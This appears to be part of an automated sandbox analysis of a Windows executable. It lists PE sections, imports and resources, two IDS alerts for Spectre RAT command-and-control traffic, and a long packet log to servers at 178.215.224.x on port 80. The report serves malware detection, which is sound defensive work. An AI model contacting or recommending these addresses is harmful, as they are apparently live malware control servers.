                                        • [ C ] VS2008 SP1 build 30729
                                        • [IMP] VS2008 SP1 build 30729
                                        • [ C ] VS2010 SP1 build 40219
                                        • [RES] VS2010 SP1 build 40219
                                        • [LNK] VS2010 SP1 build 40219

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x100aa.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0xf32990x2888
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                        .rsrc0xf40000x100aa0x10200633f1738f646d4cc220841f666c98157False0.9424660852713178data7.804758405555712IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x1050000xf320x1000a86e44061c0acca671b37e618762e7b9False0.589111328125data5.4135077324983545IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_ICON0xf42380x8734PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9860453022073269
                                        RT_ICON0xfc96c0x5eeePNG image data, 128 x 128, 8-bit/color RGBA, non-interlacedEnglishUnited States1.0006583820261707
                                        RT_ICON0x10285c0x1128Device independent bitmap graphic, 32 x 64 x 32, image size 4352EnglishUnited States0.5443989071038251
                                        RT_DIALOG0x1039840x100dataEnglishUnited States0.5234375
                                        RT_DIALOG0x103a840x11cdataEnglishUnited States0.6056338028169014
                                        RT_DIALOG0x103ba00x60dataEnglishUnited States0.7291666666666666
                                        RT_GROUP_ICON0x103c000x30dataEnglishUnited States0.8541666666666666
                                        RT_VERSION0x103c300x1a4dataEnglishUnited States0.5619047619047619
                                        RT_MANIFEST0x103dd40x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193

                                        Imports

                                        DLLImport
                                        KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                        USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                        SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                        ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                        ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                        VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Suricata IDS Alerts

                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2024-11-21T20:00:35.393060+01002853767ETPRO MALWARE Win32/Spectre RAT CnC Activity M11192.168.2.449874178.215.224.7480TCP
                                        2024-11-21T20:00:35.393060+01002853768ETPRO MALWARE Win32/SpectreRAT CnC Activity M21192.168.2.449874178.215.224.7480TCP

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Nov 21, 2024 19:59:39.086601973 CET4974380192.168.2.4178.215.224.252
                                        Nov 21, 2024 19:59:39.209808111 CET8049743178.215.224.252192.168.2.4
                                        Nov 21, 2024 19:59:39.209899902 CET4974380192.168.2.4178.215.224.252
                                        Nov 21, 2024 19:59:39.210114956 CET4974380192.168.2.4178.215.224.252
                                        Nov 21, 2024 19:59:39.330024004 CET8049743178.215.224.252192.168.2.4
                                        Nov 21, 2024 20:00:01.175491095 CET8049743178.215.224.252192.168.2.4
                                        Nov 21, 2024 20:00:01.178118944 CET4974380192.168.2.4178.215.224.252
                                        Nov 21, 2024 20:00:01.178508997 CET4974380192.168.2.4178.215.224.252
                                        Nov 21, 2024 20:00:01.298418045 CET8049743178.215.224.252192.168.2.4
                                        Nov 21, 2024 20:00:06.693001032 CET4980480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:06.812601089 CET8049804178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:06.812696934 CET4980480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:06.814177036 CET4980480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:06.934356928 CET8049804178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:08.171070099 CET8049804178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:08.179836988 CET4980480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:08.299897909 CET8049804178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:08.299999952 CET4980480192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:08.394947052 CET4980780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:08.516541958 CET8049807178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:08.516613007 CET4980780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:08.516844988 CET4980780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:08.636246920 CET8049807178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:09.825196981 CET8049807178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:09.828131914 CET4980780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:09.948107004 CET8049807178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:09.948199987 CET4980780192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:10.033508062 CET4981380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:10.153115988 CET8049813178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:10.153281927 CET4981380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:10.153579950 CET4981380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:10.274111032 CET8049813178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:11.456861973 CET8049813178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:11.463540077 CET4981380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:11.583690882 CET8049813178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:11.583750010 CET4981380192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:11.708165884 CET4981980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:11.827800989 CET8049819178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:11.827908993 CET4981980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:11.828119993 CET4981980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:11.947635889 CET8049819178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:13.182924032 CET8049819178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:13.190097094 CET4981980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:13.311888933 CET8049819178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:13.311958075 CET4981980192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:13.369386911 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:13.488929033 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:13.489000082 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:13.489723921 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:13.609267950 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:14.911429882 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:14.911456108 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:14.911467075 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:14.911549091 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:14.911601067 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:14.911644936 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:14.911746025 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:14.911756992 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:14.911763906 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:14.911773920 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:14.911778927 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:14.911787033 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:14.911976099 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.034287930 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.034346104 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.034400940 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.038388968 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.090678930 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.123430014 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.123543024 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.123581886 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.127649069 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.127768040 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.127815008 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.136044979 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.136192083 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.136245012 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.144476891 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.144547939 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.144622087 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.152785063 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.152893066 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.152940989 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.161139965 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.161284924 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.161359072 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.169625998 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.169960976 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.170046091 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.177959919 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.178003073 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.178076029 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.186448097 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.186497927 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.186539888 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.194693089 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.194736004 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.194803953 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.210246086 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.210505962 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.210586071 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.243072033 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.243108988 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.243211031 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.333956957 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.333988905 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.334131956 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.335526943 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.335647106 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.335692883 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.340989113 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.341098070 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.341150999 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.346685886 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.346757889 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.346807957 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.352010965 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.352114916 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.352174997 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.357470036 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.357575893 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.357626915 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.362895012 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.363159895 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.363213062 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.368350983 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.368467093 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.368520021 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.374003887 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.374146938 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.374200106 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.377644062 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.377795935 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.377841949 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.381557941 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.381690025 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.381762981 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.385329008 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.385493040 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.385546923 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.389130116 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.389288902 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.389333963 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.392924070 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.393065929 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.393114090 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.396778107 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.396897078 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.396943092 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.400580883 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.400682926 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.400734901 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.404341936 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.404467106 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.404511929 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.408158064 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.408312082 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.408413887 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.411969900 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.412130117 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.412177086 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.415767908 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.415918112 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.415967941 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.419514894 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.465672970 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.544312000 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.544435024 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.544477940 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.545185089 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.545310020 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.545346975 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.548283100 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.548367977 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.548409939 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.550649881 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.550704956 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.550746918 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.553685904 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.553746939 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.553788900 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.556603909 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.556684971 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.556720018 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.559688091 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.559741020 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.559773922 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.562668085 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.562803984 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.562844038 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.565783024 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.565886021 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.565920115 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.568739891 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.568847895 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.568888903 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.571866989 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.571923018 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.571959972 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.574863911 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.574898958 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.574942112 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.577819109 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.577893972 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.577939034 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.580884933 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.580960989 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.581002951 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.583918095 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.584028006 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.584072113 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.586872101 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.587002039 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.587119102 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.589967012 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.590080023 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.590173006 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.592911005 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.593009949 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.593055010 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.595973015 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.596003056 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.596040964 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.599061012 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.599117994 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.599153042 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.602041960 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.602118969 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.602171898 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.605058908 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.605150938 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.605214119 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.608191013 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.608288050 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.608411074 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.611130953 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.611193895 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.611241102 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.614171982 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.614233971 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.614291906 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.617110968 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.617213964 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.617257118 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.620181084 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.620285034 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.620325089 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.623188019 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.623275042 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.623327971 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.626257896 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.626358032 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.626399040 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.629251003 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.629362106 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.629399061 CET4982180192.168.2.4178.215.224.74
                                        Nov 21, 2024 20:00:15.632276058 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.632364988 CET8049821178.215.224.74192.168.2.4
                                        Nov 21, 2024 20:00:15.632399082 CET4982180192.168.2.4178.215.224.74
